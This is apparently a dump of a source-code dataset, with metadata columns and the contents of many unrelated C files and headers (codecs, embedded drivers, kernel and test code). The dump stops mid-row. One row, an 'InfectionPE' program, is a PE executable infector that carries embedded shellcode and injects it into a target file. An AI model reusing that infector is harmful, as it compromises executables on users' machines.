blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 268 | content_id stringlengths 40 40 | detected_licenses listlengths 0 58 | license_type stringclasses 2
values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 816
values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.31k 677M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23
values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 151
values | src_encoding stringclasses 33
values | language stringclasses 1
value | is_vendor bool 2
classes | is_generated bool 2
classes | length_bytes int64 3 10.3M | extension stringclasses 119
values | content stringlengths 3 10.3M | authors listlengths 1 1 | author_id stringlengths 0 228 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e8bba382476429d49dd345a241c3cfe86e3f0d1b | c41937f616f1d837078fc2dbc035085150c66315 | /prabha34.c | 28d545abc443b434ae58924bbf8e6649e678e840 | [] | no_license | iamprabhakaran/prabha | 1ebb743b394f28ccb2249c9b0f8f5c5e5999d418 | 2fdab8620df2a038160291cb65ef8abd23f2cbf3 | refs/heads/master | 2021-01-25T13:17:32.956468 | 2018-03-02T07:58:32 | 2018-03-02T07:58:32 | 123,546,741 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 294 | c | #include <stdio.h>
#include<string.h>
int main()
{
char s[100];
int l,count=1,i;
scanf("%s,s");
l=strlen(s);
for(i=0;i<l;i++)
{
if(s[i]=='.')
count++;
printf("%d",count);
else
printf("%d",count);
}
return 0;
}
| [
"noreply@github.com"
] | iamprabhakaran.noreply@github.com |
0b85c768d7522485c57180a7dc9cb1045b395051 | af9b7a49f5912142ff4e7cb35fd11b1e9635154d | /sdk/codec/amrcodec/include/d1035pf.h | 71e70b596d3a6131634e2e3c77a08f29bc5e627d | [] | no_license | YuHsinShi/2430personal | 528ff02226102af77a006fef80fe7c35139fa7bb | 83e1ce53a7d872ed27bad4ba5549953975c0be3b | refs/heads/master | 2023-03-06T14:44:31.607663 | 2020-07-25T15:55:28 | 2020-07-25T15:55:28 | 340,536,248 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,442 | h | /*
********************************************************************************
*
* GSM AMR-NB speech codec R98 Version 7.6.0 December 12, 2001
* R99 Version 3.3.0
* REL-4 Version 4.1.0
*
****************************************************... | [
"lawrence.shi@ite.com.tw"
] | lawrence.shi@ite.com.tw |
485d688faa00c7fa19755bfa3a9ea40c865a907d | 06f6868d419a0105e4dd7a57f4c4e58cdf218325 | /Tool/Plot_mtw.C | 305275d2e450de31d9312591d820f6a5be26c11e | [] | no_license | susy2015/LostLepton | 08652256c42d12b32286f3d6d72404c7580f560b | 5fa8336e3a6ca6f6d598f0269ba4280edd65b485 | refs/heads/master | 2021-01-19T01:20:16.308099 | 2017-01-24T15:08:57 | 2017-01-24T15:08:57 | 30,090,080 | 0 | 2 | null | 2017-01-24T15:08:58 | 2015-01-30T20:47:16 | C++ | UTF-8 | C | false | false | 1,769 | c | {
TFile *f = new TFile("123.root");
//f.ls();
TCanvas *c = new TCanvas("c","A Simple Graph Example",200,10,700,500);
c->SetLogy();
gStyle->SetOptStat(0);
TH1D *h1 = (TH1D*)f.Get("h_b_mtw_ttbar");
h1->GetXaxis()->SetRangeUser(0,500);
h1->GetXaxis()->SetTitle("MtW [GeV]");
h1->SetLineColor(1);
... | [
"hua.wei@cern.ch"
] | hua.wei@cern.ch |
1e65e449bbd20c232b23543ebfe41fea047d296e | 0f8566321094bc3d47c5ebc9e879e7a4a09e488f | /cc3200-sdk/ti_rtos/ti_rtos_config/ewarm/iar/tirtos/xdc/runtime/knl/IGateThreadSupport.h | f177e87e274ee712315174139377046f3c76763a | [
"MIT"
] | permissive | SiarheiVolkau/CC3200-Linux-SDK-GCC | 0baa4bf90450b7cde0cb52110db3595700a8630b | 2a965aa1b2351e127c912c2307ccb30dea5c065c | refs/heads/master | 2021-01-22T19:21:48.739505 | 2017-03-21T15:30:44 | 2017-03-21T15:30:44 | 85,189,439 | 2 | 3 | null | null | null | null | UTF-8 | C | false | false | 10,625 | h | /*
* Do not modify this file; it is automatically
* generated and any modifications will be overwritten.
*
* @(#) xdc-B06
*/
/*
* ======== GENERATED SECTIONS ========
*
* PROLOGUE
* INCLUDES
*
* PER-INSTANCE TYPES
* VIRTUAL FUNCTIONS
* FUNCTION STUBS
* ... | [
"lis82@mail.by"
] | lis82@mail.by |
b87c4945a96bded43e6ffbf44103753c70113100 | 569db0f6aacbd992ef46101e03f19e492c6172e2 | /libstr/src/str_compare.c | 21e9650d0b96cdd1d58f15822bca4567394206ce | [] | no_license | coolzoom/xternal | f9897409386414660cdd392065b963f0203f0ddc | 1cfcaacbdeca03cacc8f8d6ed8a51c8942ca277d | refs/heads/master | 2020-06-12T05:43:24.560270 | 2017-07-10T23:12:53 | 2017-07-10T23:12:53 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,868 | c |
#include "../include/libstr.h"
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <assert.h>
int strcmp_I(const char *cs, const char *ct)
{
int q = 0;
if ( cs && ct ) do
{
q = toupper((uint8_t)*cs) - toupper((uint8_t)*ct++);
}
while ( *cs++ && !q );
re... | [
"alexey@sudachen.name"
] | alexey@sudachen.name |
33688288adcf3729086d18f7aeb7bdba6d5b4491 | 66d339399671f9520e88d79b7118b6670f6a40a2 | /code/1494.c | 4dec0544dc0ead172e3f832d6e42511798e17f08 | [
"MIT"
] | permissive | Tarpelite/OJ_research | 038ba1b3a5d8add01642cddd45b59722144ac110 | 5c23591a50e755dac800dfaedb561290ce35fc5b | refs/heads/master | 2020-06-07T10:52:17.059468 | 2019-06-21T10:47:56 | 2019-06-21T10:47:56 | 193,003,111 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 964 | c | # include <stdio.h>
void QuickSort(int *, int, int);
int main(void)
{
int i,j,n,k,s=0;
scanf("%d",&n);
int a[n],b[n];
for(i=0;i<n;i++){
scanf("%d",&a[i]);
}
QuickSort(a,0,n-1);
scanf("%d",&k);
b[0]=a[0];
for(j=i=1;i<n;i++){
if(a[i]==a[i-1])
continue;
else{
b[j]=a[i];
j++;
}... | [
"tarpelite_chan@foxmail.com"
] | tarpelite_chan@foxmail.com |
e3d7485b61e1c0d6a58e52e8d44c1decd5d1d8ab | c45bac076885164c6212afe2009962996e703c1c | /tts_dll/ttsdll/HTS_hidden.h | 1f5b078f4a8cb61543c706cd24181d9127126133 | [] | no_license | darkmarbo/stt-eng | 80c92bef954dd13c1c1d397a3ff63b983552d0e5 | 2c1186ca508abecf88158a74761bd1180db87742 | refs/heads/master | 2021-08-22T20:34:48.540820 | 2017-12-01T06:58:25 | 2017-12-01T06:58:25 | 111,901,029 | 0 | 2 | null | null | null | null | UTF-8 | C | false | false | 6,466 | h | /* ----------------------------------------------------------------- */
/* The HMM-Based Speech Synthesis System (HTS) */
/* hts_engine API developed by HTS Working Group */
/* http://hts-engine.sourceforge.net/ */
/* -----------------------------... | [
"shaozhiming@speechocean.com"
] | shaozhiming@speechocean.com |
f6ee5d18707b70f3f54d832db0d09af37478d214 | 374d21764c61f6d6d8cd7440d67baaa6b94c7058 | /COL106/Assignment 4/Final/HashTest.h | f3713c8da5525fc79541eea5124a6ed1a4821e2a | [] | no_license | kartikeyagup/CourseWork | 9bea526fa9e58201d39e70db869c0574f87367b9 | 1ed2398b76a282c57f934b10b1d9a672a1903158 | refs/heads/master | 2020-04-11T08:43:08.624820 | 2015-05-09T19:17:39 | 2015-05-09T19:17:39 | 30,117,883 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 293 | h | #ifndef HASHTEST_H
#define HASHTEST_H
bool RunAllTests();
bool GetValueTests();
bool HashingTests();
bool HashTableTests();
bool InitialisingAndInsertingTests();
bool WordBestTests();
bool HashInsertTests();
bool HashCompDeTests();
bool ASCITests();
bool PrimeTests();
#endif
| [
"kartikeyagup@github.com"
] | kartikeyagup@github.com |
a7498a97864c9e325b42b00805f42c7f023de4d2 | a1e324237ddb7f2d596eaa598ba8145d99f329ab | /tests/vm/mmap-over-data.c | 97afa97be51bd3a9fc954a20d2181d6ae0083618 | [
"MIT-Modern-Variant",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] | permissive | EE415/pintos_choibang | cff41869d3c2bc0792ed17e9af2dca400ac7682e | 0a81c593eef0bbb93f25098c3d91d7a22d2894e5 | refs/heads/master | 2021-01-18T23:10:10.445275 | 2016-06-06T02:28:50 | 2016-06-06T02:28:50 | 54,000,714 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 455 | c | /* Verifies that mapping over the data segment is disallowed. */
#include <stdint.h>
#include <round.h>
#include <syscall.h>
#include "tests/lib.h"
#include "tests/main.h"
static char x;
void
test_main (void)
{
uintptr_t x_page = ROUND_DOWN ((uintptr_t) &x, 4096);
int handle;
CHECK ((handle = open ("sample.tx... | [
"achoi0330@gmail.com"
] | achoi0330@gmail.com |
3e2480d453dc408fc4228c58338d12614c5c8f48 | 260349edd3e9ebba45f22ea7d46d89b7e37744a7 | /STM32F4/SensorNode/Src/gpio.c | 0c3db3a26cc3712ec11d9c7e37cd52d8b0c0134f | [] | no_license | bsheridan94/Corvus-Perception | 82d14590c9f8c90b40e78d252e18e7cba4b6bdc7 | b6ece823dca1b08509e03a1261f10047975bc195 | refs/heads/master | 2021-01-09T06:21:54.575334 | 2017-05-26T01:36:31 | 2017-05-26T01:36:31 | 80,971,659 | 1 | 0 | null | null | null | null | UTF-8 | C | false | false | 4,083 | c | /**
******************************************************************************
* File Name : gpio.c
* Description : This file provides code for the configuration
* of all used GPIO pins.
******************************************************************************
*... | [
"btsheridan94@gmail.com"
] | btsheridan94@gmail.com |
a966bc6415274ae642e4d353d693b348cc0284f7 | 7dcdecdf8fee6671be0f3f24ef8918853978a2e7 | /Movement/GccBoardProject1/src/ASF/sam/utils/cmsis/sam3x/include/component/component_pdc.h | fa8f8966cf68ad591dfe008a6248212abf7b31f5 | [] | no_license | sebhero/Consuela | 15e03de86f5dc9af2505f8c9692cc67bde07c489 | 217acc3220c6e7076b84a5654d7a180578b9da1c | refs/heads/master | 2021-01-19T03:07:36.602903 | 2017-05-30T11:45:26 | 2017-05-30T11:45:26 | 87,305,072 | 2 | 1 | null | null | null | null | UTF-8 | C | false | false | 6,605 | h | /**
* \file
*
* Copyright (c) 2014 Atmel Corporation. All rights reserved.
*
* \asf_license_start
*
* \page License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must ... | [
"robin.lennart.johnsson@gmail.com"
] | robin.lennart.johnsson@gmail.com |
f374ef6f5d4e2d516e4de25e16ed32d0dffe67a7 | d5b94bd27c5a8d7c7e5245d2e4268e77a639f073 | /.stack-work/ghci/f374ef6f/cabal_macros.h | 91ef6e60ff349e79476149d4205558125e0300db | [] | no_license | dhaile33/MP2-interpreter | 3c0e639f3d8b582b86b4cd6badea7ca39743b146 | b9c0dd5c55867ce9080184ab51e7fda130d4a5fe | refs/heads/main | 2023-09-01T14:06:44.746980 | 2021-09-24T05:21:53 | 2021-09-24T05:21:53 | 409,838,722 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 22,425 | h | /* DO NOT EDIT: This file is automatically generated by Cabal */
/* package interpreter-0.3.0.0 */
#ifndef VERSION_interpreter
#define VERSION_interpreter "0.3.0.0"
#endif /* VERSION_interpreter */
#ifndef MIN_VERSION_interpreter
#define MIN_VERSION_interpreter(major1,major2,minor) (\
(major1) < 0 || \
(major1) =... | [
"dangehe2012@gmail.com"
] | dangehe2012@gmail.com |
101f32b44d5b3669a8477adf4262455f76df81d7 | b5d6cd3d27534f169789e0c8abca3a6de47b31d3 | /QLIB/QCALC.C | 6a524755718f8836cf44eb8126108f524aa2d3c9 | [] | no_license | luxigo/metricsphere | faea406ef745e075674e28fb816189e663fb0969 | 18005d143de38f6edadf371b272cb493f39b3665 | refs/heads/master | 2020-06-07T10:00:32.700737 | 2014-09-19T15:27:40 | 2014-09-19T15:27:40 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 36,579 | c | /* calc.c */
/* Keyboard command interpreter */
/* Copyright 1985 by S. L. Moshier */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "qhead.h"
#include "mconf.h"
#ifdef UNK
#if BIGENDIAN
#define MIEEE 1
#else
#define IBMPC 1
#endif
#undef UNK
#endif
/* Define nonzero for extra functions, making ... | [
"luc.deschenaux@freesurf.ch"
] | luc.deschenaux@freesurf.ch |
7253eb11cfb23c0c226a66e24a1701ba5a5fe26c | ce6f01753f94746c76570c90444dfdc9c5ba8e34 | /x4/ike/src/phasex.h | d8b04c27aaad1e8862ce77704d95bcfdd4f0c373 | [
"BSD-3-Clause"
] | permissive | syxoasis/libike | 3f4b1cd961b5ef336399c02f52bd6d64a433516b | 79c5dc79d7f59cac90beef402cb8880707f0026f | refs/heads/master | 2021-01-13T01:04:00.982438 | 2012-01-25T17:40:30 | 2012-01-25T17:40:30 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 853 | h | /*
* This file is a part of libike library.
* Copyright (c) 2003-2011 Alex Pankratov. All rights reserved.
*
* http://swapped.cc/libike
*/
/*
* The library is distributed under terms of BSD license.
* You can obtain the copy of the license by visiting:
*
* http://www.opensource.org/licenses/bsd-license.php
... | [
"ap@swapped.cc"
] | ap@swapped.cc |
5b2d2cca8bb5710e917f26c00ee59b64164555d1 | 43aa6c8707e4307dd4d41a70cc79c1560bc77fca | /oldskool/InfectionPE/main.c | f98a53d07b290273f44f2771b714a30fd6911656 | [] | no_license | IMULMUL/stuffz | 5640ac70f0069042bf58737fd85f051ed42db172 | f5941bac060a8fb4cb66e605000d3bd706875458 | refs/heads/master | 2022-12-22T16:26:48.636866 | 2022-12-18T00:44:39 | 2022-12-18T00:44:39 | 202,901,822 | 0 | 0 | null | 2022-12-18T08:40:00 | 2019-08-17T15:55:00 | C | ISO-8859-1 | C | false | false | 5,363 | c | #include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <string.h>
#define USAGE "usage : ./%s <file>.\r\n"
long AligneSur(long alignement,long valeur);
int main(int argc , char* argv[])
{
/* merci à baboon pour la modif du shellcode :) */
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2... | [
"0vercl0k@tuxfamily.org"
] | 0vercl0k@tuxfamily.org |
7776f972e94961b2a5405ba88702aa3562f768fe | 2cb3f3dac433fec9a624bf11f05b522b16438619 | /list.c | 32b7b501eb2ba390a26fd8a1439879d52e7a27a5 | [
"BSD-2-Clause"
] | permissive | edc/mcs | 154884f459e0f83eeaf3566c8872598f695869df | 027a93808c0dc48b7e059ebb580c0c510cbc2e45 | refs/heads/master | 2018-12-31T17:08:37.569553 | 2011-11-21T21:01:12 | 2011-11-21T21:01:22 | 2,799,550 | 2 | 1 | null | null | null | null | UTF-8 | C | false | false | 461 | c | #define __LIST_C
#include "list.h"
short* foreach(short* list, short** bk)
{
if (*bk == NULL)
*bk = list;
short* peek = NULL;
while (!EOL(**bk)) {
if (!NA(**bk)) {
*bk = *bk + 1;
return *bk - 1;
} else {
/* move following */
if (peek == NULL) peek = *bk + 1;
else peek ++;
**bk = *peek;
... | [
"cao.yiqun@gmail.com"
] | cao.yiqun@gmail.com |
3f6cc4655f9ed0382af9e106dd8ca9c8d34ed18c | a6f4c8c91414d62fad5f8f7f53b1dee9c9d099ee | /R-Portable-Mac/library/sp/include/sp.h | 763f1571c1eb7dbeecd861d36fbf032e7e5826a6 | [
"LicenseRef-scancode-unknown-license-reference",
"CC0-1.0",
"GPL-2.0-only"
] | permissive | sdownin/sequencer | 6a2d70777fbd8109e26f126229b5ee10348cf4e7 | 045d0580e673cba6a3bd8ed1a12ff19494bf36fa | refs/heads/master | 2023-08-04T08:06:02.891739 | 2023-08-03T04:07:36 | 2023-08-03T04:07:36 | 221,256,941 | 2 | 1 | CC0-1.0 | 2023-02-04T15:06:14 | 2019-11-12T16:00:50 | C++ | UTF-8 | C | false | false | 3,030 | h | #ifndef R_SP_H
#define R_SP_H
#ifdef SP_XPORT
# define SP_PREFIX(name) SP_XPORT(name)
#else
# define SP_PREFIX(name) name
#endif
/* remember to touch local_stubs.c */
#define SP_VERSION "1.2-7"
#include <R.h>
/* RSB 091203 */
#include <Rdefines.h>
#define R_OFFSET 1
#include <Rinternals.h>
#include <Rmath.h>
/* fro... | [
"pgordon@cbuscollaboratory.com"
] | pgordon@cbuscollaboratory.com |
eeef088cf06803ca58b50dd571c7b09dd8669500 | 57b58686717bdd787539def23ff11976336f0ec9 | /scsi_pseudo/scsi_pseudo_impl.c | 28b2c051fec2670ce127ab982ca640aa48b33579 | [] | no_license | x2c3z4/linux-drivers | 067adaf07e8dbeae68ede632c5b6a7425b27ecf1 | 65cced8ae01c244333010ff3ee29fbcbc4f63bf4 | refs/heads/master | 2021-08-25T06:30:33.176535 | 2015-12-01T11:37:17 | 2015-12-01T11:37:17 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 29,063 | c |
#define pr_fmt(fmt) KBUILD_MODNAME ":%s: " fmt, __func__
#include "scsi_pseudo.h"
int fill_from_dev_buffer(struct scsi_cmnd *scp, unsigned char *buf,
int buf_len);
int fetch_to_dev_buffer(struct scsi_cmnd *scp, unsigned char *buf,
int buf_len);
static const int check_condition_result =
(DR... | [
"lifeng1519@gmail.com"
] | lifeng1519@gmail.com |
c17801a7fd956d67af680b31f34726390e50b7d1 | 3addc4499955c54d510da2f444066c4b04bca9e0 | /02_handle_dev.c | 3931a8881bba1d219de4bc4e52b28cae515f3bab | [] | no_license | joaofreitas/libpcap-08 | bbeb1649db061e16c33a5f68c5da0dce646460ad | 06d74c17a286cb5a2fc2bdef3963998f1b1fa4a8 | refs/heads/master | 2020-05-29T21:39:36.486448 | 2011-11-12T14:31:01 | 2011-11-12T14:31:01 | 2,761,704 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 472 | c | #include <stdio.h>
#include <pcap.h>
int main(int argc, char *argv[]) {
char *dev, errbuf[PCAP_ERRBUF_SIZE];
pcap_t *handle;
dev = pcap_lookupdev(errbuf);
if (dev == NULL) {
fprintf(stderr, "Couldn't find default device: %s\n", errbuf);
return(2);
}
handle = pcap_open_live(dev, BUFSIZ, 1, 1000, errbuf);
... | [
"joao.freitas@seatecnologia.com.br"
] | joao.freitas@seatecnologia.com.br |
e06231852cc5af1092c3947cab10276d46b54c3d | 060bc5ba9a8f707bdac927f30842febf9a4676a1 | /sys/pmax/pmax/kmin.h | 15a679bc08564c60568efdf5b0095f2a4d3d36af | [
"BSD-4-Clause-UC",
"LicenseRef-scancode-other-permissive"
] | permissive | sergev/LiteBSD | 14ae93caa709d4707c3b122c243641c8214583c3 | 6f89c18880065a83d3d18661c80f72fb3397a888 | refs/heads/master | 2023-01-10T02:20:05.357875 | 2022-07-19T16:41:32 | 2022-07-19T16:41:32 | 19,167,171 | 318 | 58 | NOASSERTION | 2022-12-28T16:23:01 | 2014-04-26T02:55:34 | C | UTF-8 | C | false | false | 12,965 | h | /*-
* Copyright (c) 1992, 1993
* The Regents of the University of California. All rights reserved.
*
* This code is derived from software contributed to Berkeley by
* The Mach Operating System project at Carnegie-Mellon University,
* Ralph Campbell and Rick Macklem.
*
* Redistribution and use in source and bi... | [
"serge@vak.ru"
] | serge@vak.ru |
3fc5da67897ca5438cdccfd1226e753e847ba00f | fbab4b2242e5c0a0c3d36a00fea39dec0832c309 | /1. Tcc/0. Dev Training/1. Junior/1. utils/10.Alog/Alog.c | f0afa29cdca14fc637e099053892d4b7d1bffaf7 | [] | no_license | skynimrod/dt_c | a3b9385e8f64b540e50e3e65858d385a14a6ab8f | 4efd2cb3e0c3bdeb079c5f625bcda53f0df92eaf | refs/heads/master | 2021-10-24T03:37:52.567819 | 2019-03-21T17:17:14 | 2019-03-21T17:17:14 | 103,610,718 | 0 | 0 | null | null | null | null | GB18030 | C | false | false | 18,445 | c | //***************************************************************************
//
// Copyright (C) 2001-2002 AQUGEN TECH CO.,LTD
// All Rights Reserved ... | [
"adamswang_2000@aliyun.com"
] | adamswang_2000@aliyun.com |
1940f89218f96891bba43bcb83f33b6ac3b95d80 | 976f5e0b583c3f3a87a142187b9a2b2a5ae9cf6f | /source/fastsocket/kernel/net/can/extr_bcm.c_bcm_rx_timeout_tsklet.c | 9511966d14b97fc8590b47c50a2e68e9a52f2140 | [] | no_license | isabella232/AnghaBench | 7ba90823cf8c0dd25a803d1688500eec91d1cf4e | 9a5f60cdc907a0475090eef45e5be43392c25132 | refs/heads/master | 2023-04-20T09:05:33.024569 | 2021-05-07T18:36:26 | 2021-05-07T18:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,355 | c | #define NULL ((void*)0)
typedef unsigned long size_t; // Customize by platform.
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__; // Either arithmetic or pointer type.
/* By default, we understand bool (as a convenience). */
typedef int bool;
#define false 0
#define true 1
/* Forward d... | [
"brenocfg@gmail.com"
] | brenocfg@gmail.com |
b4c33f75aaf57c7af7c10263c64205326d76fa3f | 560cb5ed9c8df6c4ec6b276b7f422b72a7bdc2eb | /Artmame/src/cpu/cop400/cop410.c | 4ed752ca1f9773a0589042eac0ccf8fe9994190a | [] | no_license | shangma/mame0112 | 3503af14b38ad382257f01c74638e7a6f7861f1d | e98e2daebda9f430519893ac61232b8eae74516b | refs/heads/master | 2020-04-06T03:47:11.945469 | 2012-07-03T15:43:29 | 2012-07-03T15:43:29 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 18,631 | c | /**************************************************************************
* National Semiconductor COP410 Emulator *
* *
* Copyright (C) 2005 by Dan Boris *
***********... | [
"arthur_choung@me.com"
] | arthur_choung@me.com |
0afa393b587b3ff7b7931bef0c6aeb839f7a2655 | f0e3711ccbd21beec9f948ddc73cec3cd1c545e7 | /rfmsrc/master/queue.c | 70927fb744a12ac5187233b745e5dc9d946403c2 | [] | no_license | piontec/openhr20 | a1d542f09f6e2f35a3d0c379540cc00c399fe86c | 44aaf9a806610ab49a4935388ea323142d5908ea | refs/heads/master | 2021-08-04T08:21:35.090572 | 2021-02-10T13:21:03 | 2021-02-10T13:21:03 | 7,669,292 | 5 | 1 | null | null | null | null | UTF-8 | C | false | false | 3,046 | c | /*
* Open HR20 - RFM12 master
*
* target: ATmega32 @ 10 MHz in Honnywell Rondostat HR20E master
*
* compiler: WinAVR-20071221
* avr-libc 1.6.0
* GCC 4.2.2
*
* copyright: 2008 Dario Carluccio (hr20-at-carluccio-dot-de)
* 2008 Jiri Dobry (jdobry-at-centrum-dot-... | [
"dobryj@e6282f77-c345-0410-9e5f-9d7f1dee61d8"
] | dobryj@e6282f77-c345-0410-9e5f-9d7f1dee61d8 |
84c695ee0f23899cb908d68c396e581d7466ea68 | 0c87b9c5e6eba9f4234063a631ec998e9dcd9533 | /NCO/NCO.h | eb8097dc6fed6bb0fcc306e0e701cb77223e3266 | [] | no_license | SNGomashie/BBBLockin | 414c9095a5a8b7f3cad5fc9e638863cfdbd3dffb | 04e31ade4f8fc5e34f5ed8fa7265baaf5bb9b4fe | refs/heads/master | 2021-08-08T11:49:04.886877 | 2019-06-07T08:46:12 | 2019-06-07T08:46:12 | 173,069,509 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 644 | h | #ifndef __AM335X_PRU_NCO_H_
#define __AM335X_PRU_NCO_H_
#include <pru_ecap.h>
#define LUTSIZE 1024
#define QSIZE (LUTSIZE / 4)
#define HSIZE (LUTSIZE / 2)
#define TQSIZE ((LUTSIZE * 3) / 4)
#define POW (LUTSIZE << 16)
#define FRAC 0xFFFF
struct NCO {
uint32_t sample_period;
volatile uint32_t *period;
uint64_... | [
"40298891+SNGomashie@users.noreply.github.com"
] | 40298891+SNGomashie@users.noreply.github.com |
f8df3d94460bbdbb75e2e3932c0b967cb0067368 | f65777edcc3e1b3a457b6a14ff78a19c01ef81bb | /PointCloudRendering/Source/Graphics/Application/GraphicsAppEnumerations.h | 9a459bf5cba8ab86c817865c1ffa3dd6932c2039 | [
"MIT"
] | permissive | jimbok8/PointCloudRendering | 0129971625d9602101823899d587111dfbfad07a | 4c5ca8f87325e0b7fc6abaa355f964ad17cdfe8f | refs/heads/master | 2023-06-25T01:43:48.986996 | 2021-07-26T10:03:50 | 2021-07-26T10:03:50 | null | 0 | 0 | null | null | null | null | ISO-8859-2 | C | false | false | 2,438 | h | #pragma once
/**
* @file GraphicsAppEnumerations.h
* @authors Alfonso López Ruiz (alr00048@red.ujaen.es)
* @date 07/12/2019
*/
/**
* @brief Enumerations for any component of this application.
*/
struct CGAppEnum
{
// Renderization modes
enum VisualizationModes : uint8_t
{
VIS_POINTS,
VIS_LINES,
VIS_TRIANGLES... | [
"allopezr@ujaen.es"
] | allopezr@ujaen.es |
5479f26176313b807d36e30802da06e7623196aa | 721e41b80003766932fa46ad0aedd87b0ae587a5 | /SensorThread.c | 2803278dcb76b45c18258f3eb4172f946fe397e0 | [] | no_license | sx386e/rtx_blinky | 50ebf4d2cf1bfe0d12e1dd21a8c9e6fb6a3ff579 | 6975467ccc87c856d2b2294534495a33ab04b0b5 | refs/heads/master | 2021-01-10T03:12:47.150922 | 2016-04-05T10:08:59 | 2016-04-05T10:08:59 | 55,497,055 | 2 | 0 | null | null | null | null | UTF-8 | C | false | false | 1,089 | c |
#include "cmsis_os.h" // CMSIS RTOS header file
#include "Board_Accelerometer.h" // ::Board Support:Accelerometer
#include "Board_Magnetometer.h" // ::Board Support:Magnetometer
ACCELEROMETER_STATE g_accel;
MAGNETOMETER_STATE g_magneto;
/*-------------... | [
"sx386e@gmail.com"
] | sx386e@gmail.com |
5e1e7ac2d1fefd1aceb63361d4826e865622d091 | 07e557360f781783f8c7710561369e8c6aa890b0 | /Software/Embedded_Linux/source/module_2015-01-09/LCD200_v3/gm8181t.c | a88416611d43ec6d0ad0d225cfa0cfeeb329e11b | [] | no_license | irwin0112/gm8136_sdk | 44a50bf6c69300daf42e258d08c8d901bdf5c1f6 | 34d03991c6a6e46ac9e1097459c569df3489149a | refs/heads/main | 2023-03-16T21:16:56.776114 | 2020-11-10T14:26:14 | 2020-11-10T14:26:14 | null | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 27,630 | c | /* -----------------------------------------------------------------------------
* PLATFORM 8181T
* -----------------------------------------------------------------------------
*/
/*
* Local function declaration
*/
static void platform_pmu_switch_pinmux_8181t(void *ptr, int on);
static void platform_pmu_switch_... | [
"wadim.mueller@continental-corporation.com"
] | wadim.mueller@continental-corporation.com |
9b35fbf3e49d1e1014579acc7a673788301aef1e | d29b86094de3eea2ca6fbeceac07f98884f96e8c | /code/tools/codegen/sparse/cse.c | e8fbe344fe3ddc8651ebd8961c4378b104f1e342 | [
"MIT"
] | permissive | crafn/revolc | 2f9da7e7d9aa6662a64cc77b582892af5b6c86f2 | 2c9cf78941bebf8d3f5d4664cd5ac06462bfe3eb | refs/heads/master | 2020-04-06T07:01:49.564271 | 2016-06-18T19:54:30 | 2016-06-18T19:54:30 | 30,916,964 | 34 | 0 | null | null | null | null | UTF-8 | C | false | false | 9,193 | c | /*
* CSE - walk the linearized instruction flow, and
* see if we can simplify it and apply CSE on it.
*
* Copyright (C) 2004 Linus Torvalds
*/
#include <string.h>
#include <stdarg.h>
#include <stdlib.h>
#include <stdio.h>
#include <stddef.h>
#include <assert.h>
#include "parse.h"
#include "expression.h"
#include... | [
"tuukka.pensala@gmail.com"
] | tuukka.pensala@gmail.com |
0854b3afb93b0f3075821368099b234d82f15a92 | c70f4fc550c994d0bcccbedecb1b50c26ac1eed8 | /Example/Pods/Headers/Private/InstaKit/REInstaUserOnPost+InstaUserOnPost.h | 132e34bbcbb71fa3ffb59d16f0823b8f91832a0e | [
"MIT"
] | permissive | rinat-enikeev/InstaKit | d66087f4f4080a72446ba5af562c141e20bd390d | 58237e7caf4d29c723d6531a0672ff1b17099199 | refs/heads/master | 2021-01-10T05:13:36.750257 | 2015-11-19T04:44:27 | 2015-11-19T04:44:27 | 46,346,081 | 0 | 0 | null | null | null | null | UTF-8 | C | false | false | 71 | h | ../../../../../Pod/Classes/Adapters/REInstaUserOnPost+InstaUserOnPost.h | [
"rinat.enikeev@gmail.com"
] | rinat.enikeev@gmail.com |
8fc5697ae60a0593ca4a166280611ff616c06541 | 3a090e932c04608be10e74cd4a8ceb453c1100df | /php/wsf_c/axis2c/axiom/src/soap/soap_body.c | be2372f6612bb3acdcc41e293b623cb32ccbe5fa | [
"Apache-2.0"
] | permissive | calders/wsf | 2b21daf1861cac6b071c489f652a4376cf55189f | d238b2a5d2b4bd13c03d8484d9c435e6cf5840d8 | refs/heads/master | 2021-01-18T08:46:55.449156 | 2015-02-10T22:24:08 | 2015-02-10T22:24:08 | 30,302,832 | 3 | 3 | null | 2016-01-08T12:56:18 | 2015-02-04T14:33:24 | C | UTF-8 | C | false | false | 18,013 | c | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may ... | [
"stijn.calders@aeronomie.be"
] | stijn.calders@aeronomie.be |
5ff1ac15b773a9eef0b1cd4e8bb43a6d64211202 | 79323b23c5bb4eebb5e90cef17b86f81105de4ef | /mcu/apollo/hal/am_hal_otp.c | af85ef29dbe0095b989acbb52688effed51ca04d | [
"BSD-2-Clause"
